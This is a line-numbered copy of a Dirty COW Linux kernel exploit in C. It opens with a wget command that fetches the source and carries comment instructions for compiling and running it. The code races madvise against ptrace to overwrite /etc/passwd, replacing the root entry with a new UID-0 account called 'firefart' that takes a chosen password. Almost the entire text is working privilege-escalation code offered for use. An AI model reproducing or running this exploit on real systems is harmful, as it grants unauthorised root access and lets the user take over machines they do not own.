Dirty Cow

1. wget https://raw.githubusercontent.com/FireFart/dirtycow/master/dirty.c
2.  
3. // This exploit uses the pokemon exploit of the dirtycow vulnerability
4. // as a base and automatically generates a new passwd line.
5. // The user will be prompted for the new password when the binary is run.
6. // The original /etc/passwd file is then backed up to /tmp/passwd.bak
7. // and overwrites the root account with the generated line.
8. // After running the exploit you should be able to login with the newly
9. // created user.
10. //
11. // To use this exploit modify the user values according to your needs.
12. // The default is "firefart".
13. //
14. // Original exploit (dirtycow's ptrace_pokedata "pokemon" method):
15. // https://github.com/dirtycow/dirtycow.github.io/blob/master/pokemon.c
16. //
17. // Compile with:
18. // gcc -pthread dirty.c -o dirty -lcrypt
19. //
20. // chmod +x dirty
21. //
22. // Then run the newly create binary by either doing:
23. // "./dirty" or "./dirty my-new-password"
24. //
25. // Afterwards, you can either "su firefart" or "ssh firefart@..."
26. //
27. // DON'T FORGET TO RESTORE YOUR /etc/passwd AFTER RUNNING THE EXPLOIT!
28. // mv /tmp/passwd.bak /etc/passwd
29. //
30. // Exploit adopted by Christian "FireFart" Mehlmauer
31. // https://firefart.at
32. //
33.  
34. #include <fcntl.h>
35. #include <pthread.h>
36. #include <string.h>
37. #include <stdio.h>
38. #include <stdint.h>
39. #include <sys/mman.h>
40. #include <sys/types.h>
41. #include <sys/stat.h>
42. #include <sys/wait.h>
43. #include <sys/ptrace.h>
44. #include <stdlib.h>
45. #include <unistd.h>
46. #include <crypt.h>
47.  
48. const char *filename = "/etc/passwd";
49. const char *backup_filename = "/tmp/passwd.bak";
50. const char *salt = "firefart";
51.  
52. int f;
53. void *map;
54. pid_t pid;
55. pthread_t pth;
56. struct stat st;
57.  
58. struct Userinfo {
59. char *username;
60. char *hash;
61. int user_id;
62. int group_id;
63. char *info;
64. char *home_dir;
65. char *shell;
66. };
67.  
68. char *generate_password_hash(char *plaintext_pw) {
69. return crypt(plaintext_pw, salt);
70. }
71.  
72. char *generate_passwd_line(struct Userinfo u) {
73. const char *format = "%s:%s:%d:%d:%s:%s:%s\n";
74. int size = snprintf(NULL, 0, format, u.username, u.hash,
75. u.user_id, u.group_id, u.info, u.home_dir, u.shell);
76. char *ret = malloc(size + 1);
77. sprintf(ret, format, u.username, u.hash, u.user_id,
78. u.group_id, u.info, u.home_dir, u.shell);
79. return ret;
80. }
81.  
82. void *madviseThread(void *arg) {
83. int i, c = 0;
84. for(i = 0; i < 200000000; i++) {
85. c += madvise(map, 100, MADV_DONTNEED);
86. }
87. printf("madvise %d\n\n", c);
88. }
89.  
90. int copy_file(const char *from, const char *to) {
91. // check if target file already exists
92. if(access(to, F_OK) != -1) {
93. printf("File %s already exists! Please delete it and run again\n",
94. to);
95. return -1;
96. }
97.  
98. char ch;
99. FILE *source, *target;
100.  
101. source = fopen(from, "r");
102. if(source == NULL) {
103. return -1;
104. }
105. target = fopen(to, "w");
106. if(target == NULL) {
107. fclose(source);
108. return -1;
109. }
110.  
111. while((ch = fgetc(source)) != EOF) {
112. fputc(ch, target);
113. }
114.  
115. printf("%s successfully backed up to %s\n",
116. from, to);
117.  
118. fclose(source);
119. fclose(target);
120.  
121. return 0;
122. }
123.  
124. int main(int argc, char *argv[])
125. {
126. // backup file
127. int ret = copy_file(filename, backup_filename);
128. if (ret != 0) {
129. exit(ret);
130. }
131.  
132. struct Userinfo user;
133. // set values, change as needed
134. user.username = "firefart";
135. user.user_id = 0;
136. user.group_id = 0;
137. user.info = "pwned";
138. user.home_dir = "/root";
139. user.shell = "/bin/bash";
140.  
141. char *plaintext_pw;
142.  
143. if (argc >= 2) {
144. plaintext_pw = argv[1];
145. printf("Please enter the new password: %s\n", plaintext_pw);
146. } else {
147. plaintext_pw = getpass("Please enter the new password: ");
148. }
149.  
150. user.hash = generate_password_hash(plaintext_pw);
151. char *complete_passwd_line = generate_passwd_line(user);
152. printf("Complete line:\n%s\n", complete_passwd_line);
153.  
154. f = open(filename, O_RDONLY);
155. fstat(f, &st);
156. map = mmap(NULL,
157. st.st_size + sizeof(long),
158. PROT_READ,
159. MAP_PRIVATE,
160. f,
161. 0);
162. printf("mmap: %lx\n",(unsigned long)map);
163. pid = fork();
164. if(pid) {
165. waitpid(pid, NULL, 0);
166. int u, i, o, c = 0;
167. int l=strlen(complete_passwd_line);
168. for(i = 0; i < 10000/l; i++) {
169. for(o = 0; o < l; o++) {
170. for(u = 0; u < 10000; u++) {
171. c += ptrace(PTRACE_POKETEXT,
172. pid,
173. map + o,
174. *((long*)(complete_passwd_line + o)));
175. }
176. }
177. }
178. printf("ptrace %d\n",c);
179. }
180. else {
181. pthread_create(&pth,
182. NULL,
183. madviseThread,
184. NULL);
185. ptrace(PTRACE_TRACEME);
186. kill(getpid(), SIGSTOP);
187. pthread_join(pth,NULL);
188. }
189.  
190. printf("Done! Check %s to see if the new user was created.\n", filename);
191. printf("You can log in with the username '%s' and the password '%s'.\n\n",
192. user.username, plaintext_pw);
193. printf("\nDON'T FORGET TO RESTORE! $ mv %s %s\n",
194. backup_filename, filename);
195. return 0;
196. }